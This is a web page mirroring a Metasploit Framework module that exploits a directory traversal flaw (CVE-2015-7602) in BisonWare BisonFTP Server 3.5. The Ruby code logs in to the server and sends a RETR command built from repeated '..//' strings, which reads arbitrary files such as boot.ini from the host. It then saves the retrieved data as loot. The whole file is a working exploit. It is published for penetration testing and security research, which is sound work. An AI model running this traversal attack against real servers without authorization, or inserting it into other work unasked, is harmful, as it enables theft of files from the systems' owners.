Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Ftp

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',

16
        'Description' => %q{

17
          This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server

18
          version 3.5. This vulnerability allows an attacker to download arbitrary files from the server

19
          by crafting a RETR command including file system traversal strings such as '..//.'

20
        },

21
        'Platform' => 'win',

22
        'Author' => [

23
          'Jay Turla', # @shipcod3, msf and initial discovery

24
          'James Fitts',

25
          'Brad Wolfe <brad.wolfe[at]gmail.com>'

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'EDB', '38341'],

30
          [ 'CVE', '2015-7602']

31
        ],

32
        'DisclosureDate' => '2015-09-28',

33
        'Notes' => {

34
          'Reliability' => UNKNOWN_RELIABILITY,

35
          'Stability' => UNKNOWN_STABILITY,

36
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),

44
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])

45
      ]

46
    )

47
  end

48


49
  def check_host(ip)

50
    begin

51
      connect

52
      if /BisonWare BisonFTP server product V3\.5/i === banner

53
        return Exploit::CheckCode::Appears

54
      end

55
    ensure

56
      disconnect

57
    end

58


59
    Exploit::CheckCode::Safe

60
  end

61


62
  def run_host(target_host)

63
    begin

64
      connect_login

65
      sock = data_connect

66


67
      # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb

68
      # and  #7582

69
      if sock.nil?

70
        error_msg = __FILE__ << '::' << __method__.to_s << ':' << 'data_connect failed; possible invalid response'

71
        print_status(error_msg)

72
        elog(error_msg)

73
      else

74
        file_path = datastore['PATH']

75
        file = ::File.basename(file_path)

76


77
        # make RETR request and store server response message...

78
        retr_cmd = ("..//" * datastore['DEPTH']) + "#{file_path}"

79
        res = send_cmd(["RETR", retr_cmd])

80


81
        # read the file data from the socket that we opened

82
        # dont assume theres still a sock to read from. Per #7582

83
        if sock.nil?

84
          error_msg = __FILE__ << '::' << __method__.to_s << ':' << 'data_connect failed; possible invalid response'

85
          print_status(error_msg)

86
          elog(error_msg)

87
          return

88
        else

89
          # read the file data from the socket that we opened

90
          response_data = sock.read(1024)

91
        end

92


93
        unless response_data

94
          print_error("#{file} not found")

95
          return

96
        end

97


98
        if response_data.length == 0

99
          print_status("File (#{file_path})from #{peer} is empty...")

100
          return

101
        end

102


103
        # store file data to loot

104
        loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)

105
        vprint_status("Data returned:\n")

106
        vprint_line(response_data)

107
        print_good("Stored #{file_path} to #{loot_file}")

108
      end

109
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e

110
      vprint_error(e.message)

111
      elog(e)

112
    rescue ::Timeout::Error, ::Errno::EPIPE => e

113
      vprint_error(e.message)

114
      elog(e)

115
    ensure

116
      data_disconnect

117
      disconnect

118
    end

119
  end

120
end

121


122